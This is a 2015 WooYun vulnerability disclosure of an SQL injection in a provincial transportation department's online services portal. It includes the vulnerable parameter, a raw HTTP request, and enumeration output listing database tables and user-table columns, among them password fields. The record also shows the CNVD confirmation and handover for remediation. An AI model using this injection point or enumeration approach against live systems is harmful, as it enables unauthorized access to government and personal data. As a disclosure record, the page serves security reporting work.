当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139611

漏洞标题:某省交通运输厅网上办事业务系统存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: qglfnt

提交时间:2015-09-10 16:42

修复时间:2015-10-26 11:24

公开时间:2015-10-26 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

RT

详细说明:

**.**.**.**:10080/qymanage/IndexNew.aspx

漏洞证明:

SQL注入数据包

GET **.**.**.**:10080/qymanage/XNetHall_OnlineTransact.aspx?pid=877dfc89-f7f9-43cc-a1ea-9c3ca5af6462 HTTP/1.1
Host: **.**.**.**:10080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**:10080/qymanage/IndexNew.aspx
Cookie: ASP.NET_SessionId=zymwkwewpvn3zab5ysc2wggx
Connection: keep-alive


所有库

20150907215314.png


当前库

20150907215417.png



Database: YnJJTApproveDB
[295 tables]
+--------------------------------------+
| AddressBookGroup |
| AddressBookGroupPerson |
| AddressBookPublic |
| ApproveApply |
| ApproveApplyRecord |
| ApproveApplyWrokFlowRelation |
| ApproveItem |
| ApproveItemAndUserDepartmentRelation |
| ApproveItemAttach |
| ApproveItemAttachLog |
| ApproveItemForDepartment |
| ApproveItemGroup |
| ApproveItemRelation |
| ApproveItemSAAInfo |
| ApproveItemServiceOBJClass |
| Archive |
| DocumentExchange |
| DocumentExchangeComment |
| DocumentExchangeOpRecord |
| DocumentTransfer |
| DocumentTransferComment |
| DocumentTransferOpRecord |
| Evaluate_AddScore |
| Evaluate_BasicInfo |
| Evaluate_Document |
| Evaluate_Grade |
| Evaluate_GradeDetail |
| Evaluate_Group |
| Evaluate_GroupUser |
| Evaluate_Norm |
| ExamAnswer |
| ExamLib |
| ExamPerson |
| ExamSubject |
| Flow |
| FlowOnForm |
| FlowWork |
| Form |
| FormField |
| Label |
| Node |
| NodeExtSetting |
| NodeFormDeploy |
| NodeRunUser |
| NodeUser |
| OA_ArticleReaded |
| OA_Articles |
| OA_ArticlesSubmit |
| OA_ArticlesUp |
| OA_Cars |
| OA_CarsApply |
| OA_DW |
| OA_DocExchangeSysWorkRelation |
| OA_DocumentArchives |
| OA_DocumentNumber |
| OA_DocumentTypes |
| OA_DocumentTypesSub |
| OA_Document_Signature |
| OA_ExtSettingDep |
| OA_ExtSettingUser |
| OA_FixAsset |
| OA_MeetingRoom |
| OA_MeetingRoomApply |
| OA_MeetingRoomApplyAndDeal |
| OA_MeetingRoomEquipmentDeal |
| OA_OfficeQRCodeFormFields |
| OA_Schedule |
| OA_ScheduleCheck |
| OA_Signature |
| OA_TableName |
| OA_TableName_20140228170023293064 |
| OA_TableName_20140304103815116141 |
| OA_TableName_20140304160758838227 |
| OA_TableName_20140306143911979561 |
| OA_TableName_20140404091609721100 |
| OA_TableName_20140415153004683685 |
| OA_TableName_20141124110348376685 |
| OA_TableName_20141203101738966713 |
| OA_TableName_20141216135006070186 |
| OA_TableName_20141216150842957721 |
| OA_TableName_20150313135240290354 |
| OA_TableName_20150407164616063214 |
| OA_TableName_20150409161556746268 |
| OA_TableName_20150413142304774755 |
| OA_TableName_20150414151646902514 |
| OA_TableName_20150417113405866140 |
| OA_TableName_20150624153348834586 |
| OA_TableName_20150624153844658147 |
| OA_TableName_20150624154329249101 |
| OA_TableName_20150624154541303040 |
| OA_TableName_20150624154957924816 |
| OA_TableName_20150624155527349812 |
| OA_TableName_20150624155642885770 |
| OA_TableName_20150624155806095344 |
| OA_TableName_20150624155912302056 |
| OA_TableName_20150624160012611456 |
| OA_TableName_20150624160129317652 |
| OA_TableName_20150624160308018056 |
| OA_TableName_20150624160411245456 |
| OA_TableName_20150624160524862710 |
| OA_TableName_20150624160707182530 |
| OA_TableName_20150624160752859813 |
| OA_TableName_20150624160848645871 |
| OA_TableName_20150624160950686670 |
| OA_TableName_20150624161226796530 |
| OA_TableName_20150624161319180705 |
| OA_TableName_20150624161359741842 |
| OA_TableName_20150624161718001482 |
| OA_TableName_20150624163032480865 |
| OA_TableName_20150624163254924760 |
| OA_TableName_20150624163418181813 |
| OA_TableName_20150624163509474644 |
| OA_TableName_20150624163658128253 |
| OA_TableName_20150624163749218463 |
| OA_TableName_20150624163903927360 |
| OA_TableName_20150624163952848802 |
| OA_TableName_20150624164028463633 |
| OA_TableName_20150624164112050034 |
| OA_TableName_20150624164210987256 |
| OA_TableName_20150624164307334813 |
| OA_TableName_20150624164355101578 |
| OA_TableName_20150624164511495623 |
| OA_TableName_20150624164627654502 |
| OA_TableName_20150624164707013767 |
| OA_TableName_20150624164827415334 |
| OA_TableName_20150624164934324270 |
| OA_TableName_20150624165029564021 |
| OA_TableName_20150624165114336112 |
| OA_TableName_20150624165206081013 |
| OA_TableName_20150624165244332780 |
| OA_TableName_20150624165927905004 |
| OA_TableName_20150624170023847542 |
| OA_TableName_20150624170106450028 |
| OA_TableName_20150624170218226564 |
| OA_TableName_20150624170248802754 |
| OA_TableName_20150624170338956103 |
| OA_TableName_20150624170412231841 |
| OA_TableName_20150624170443946525 |
| OA_TableName_20150625145500830561 |
| OA_TableName_20150625150237037224 |
| OA_TableName_20150625150311544524 |
| OA_TableName_20150625150648712160 |
| OA_TableName_20150625150714764370 |
| OA_TableName_20150625150745309725 |
| OA_TableName_20150625150906008518 |
| OA_TableName_20150625150930001580 |
| OA_TableName_20150625151001201772 |
| OA_TableName_20150625151031606582 |
| OA_TableName_20150625151107127166 |
| OA_TableName_20150625151135706530 |
| OA_TableName_20150625151206204407 |
| OA_TableName_20150625151232147716 |
| OA_TableName_20150625151301912770 |
| OA_TableName_20150625151339836234 |
| OA_TableName_20150626151341991630 |
| OA_TableName_20150626160007423214 |
| OA_TableName_20150626160314358354 |
| OA_TableName_20150626160558174455 |
| OA_TableName_20150626160741961454 |
| OA_TableName_20150626160858807768 |
| OA_TableName_20150626161020083875 |
| OA_TableName_20150626161147225187 |
| OA_TableName_20150626161314647143 |
| OA_TableName_20150626161527294786 |
| OA_TableName_20150626161705855546 |
| OA_TableName_20150626161907021682 |
| OA_TableName_20150702182117805303 |
| OA_TableName_20150702182127882770 |
| OA_TableName_20150702182346676870 |
| OA_TableName_20150706175724049811 |
| OA_TableName_20150709141755976087 |
| OA_TableName_20150709142145062082 |
| OA_TableName_20150709142346446852 |
| OA_TableName_20150709142647079122 |
| OA_TableName_20150727111438530553 |
| OA_TableName_20150731145916231205 |
| OA_TableName_FieldDescribe |
| OA_Test |
| OA_WorkApprove |
| OA_WorkApproveArchiveDocument |
| OA_WorkApproveAssign |
| OA_WorkApproveComments |
| OA_WorkApproveDelegation |
| OA_WorkApproveDelegationWork |
| OA_WorkApproveHook |
| OA_WorkApproveOnlyRecycleSelf |
| OA_WorkApproveReaded |
| OA_WorkApproveRecord |
| OA_WorkApproveRoute |
| OA_WorkApproveSignoffRecord |
| OA_WorkApproveUnion |
| OA_WorkApproveUrge |
| OA_WorkApproveVirtualRemindComments |
| OA_WorkApproveVirtualRemindReaded |
| OA_Work_Connector |
| OtherAccountRelation |
| ReceiveDocBook |
| Report_FillInfomation |
| Report_TableName |
| Route |
| SMSSend |
| SMSSendHistory |
| SysAccountRelation |
| T_AccountCustomRole |
| T_AccountCustomRoleWithFunction |
| T_AccountFunction |
| T_AccountRole |
| T_AccountRoleFunctionCommand |
| T_AccountRoleLevel |
| T_AccountRoleWithFunction |
| T_AccountUserWithRole |
| T_Catalogue |
| T_Department |
| T_DicArea |
| T_Log |
| T_Organization |
| T_PROJECT |
| T_PROPRIOTER |
| T_SiteInfo |
| T_SysDictionary |
| T_User |
| T_UserEX |
| T_UserGroup |
| T_UserGroupUser |
| T_UserHomePageStyle |
| T_UserOutSide |
| TaskPlan |
| TaskPlanImplement |
| TaskPlanRelationPlan |
| TaskPlanUserRoleDetail |
| Test_Company |
| Test_Three |
| UserScanDirectory |
| V_1234 |
| V_22222222222 |
| V_AddressBookGroupPersonInfo |
| V_AddressBookPublicInfo |
| V_ApproveApply |
| V_ApproveItemGroup |
| V_ArticleInfo |
| V_AttachUser |
| V_CarsApplyInfo |
| V_CarsInfo |
| V_CustomUserRoles |
| V_DWInfo |
| V_DataBaseTable |
| V_DelegationRuleInfo |
| V_DelegationRuleInfoWork |
| V_DocumentNumberInfo |
| V_DocumentSignatureInfo |
| V_DocumentTypesInfo |
| V_ExamAnswerInfo |
| V_ExamLibInfo |
| V_ExamPersonInfo |
| V_ExamSubjectInfo |
| V_ExchangeCommentInfo |
| V_ExchangeInfo |
| V_FixAssetInfo |
| V_FlowDep |
| V_FlowInfo |
| V_FlowUser |
| V_FormInfo |
| V_MeetingRoomApplyAndDealInfo |
| V_MeetingRoomApplyInfo |
| V_MeetingRoomEquipmentInfo |
| V_MeetingRoomInfo |
| V_NodeDisplayFormField |
| V_OA_OfficeQRCodeFormFields |
| V_Organ |
| V_ReceiveDocBookInfo |
| V_RedHead |
| V_RoleInfo |
| V_SignatureInfo |
| V_SiteWithAreaInfo |
| V_TaskPlanInfo |
| V_TimeouSstatistics |
| V_TransferCommentInfo |
| V_TransferInfo |
| V_UserGroupUserInfo |
| V_UserHomePageStyle |
| V_UserInfo |
| V_UserRoles |
| V_WorkApprove |
| V_WorkArchiveDocument |
| V_WorkAssign |
| V_WorkCount |
| V_WorkDelegationForDelegated |
| V_WorkHook |
| V_WorkUrge |
| V_WorkVirtualCommentsReadInfo |
| View_1 |
| sys_Field |
| sys_FieldValue |
| sysdiagrams |
| v_work_connector |
+--------------------------------------+


字段

Database: YnJJTApproveDB
Table: T_User
[17 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| CellPhone | nvarchar |
| CreateTime | datetime |
| Email | nvarchar |
| LastLoginIP | nvarchar |
| LockTime | datetime |
| QAnswers | nvarchar |
| QuestionIDs | nvarchar |
| RealName | nvarchar |
| Status | smallint |
| UserID | uniqueidentifier |
| UserName | nvarchar |
| UserPWD | nvarchar |
| UserSignaturePWD | nvarchar |
| UserType | smallint |
| VerifyCode | nvarchar |
| VerifyCodeGenTime | datetime |
| WrongPWDTimes | smallint |
+-------------------+------------------+


数据信息

20150907215646.jpg

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-11 11:23

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论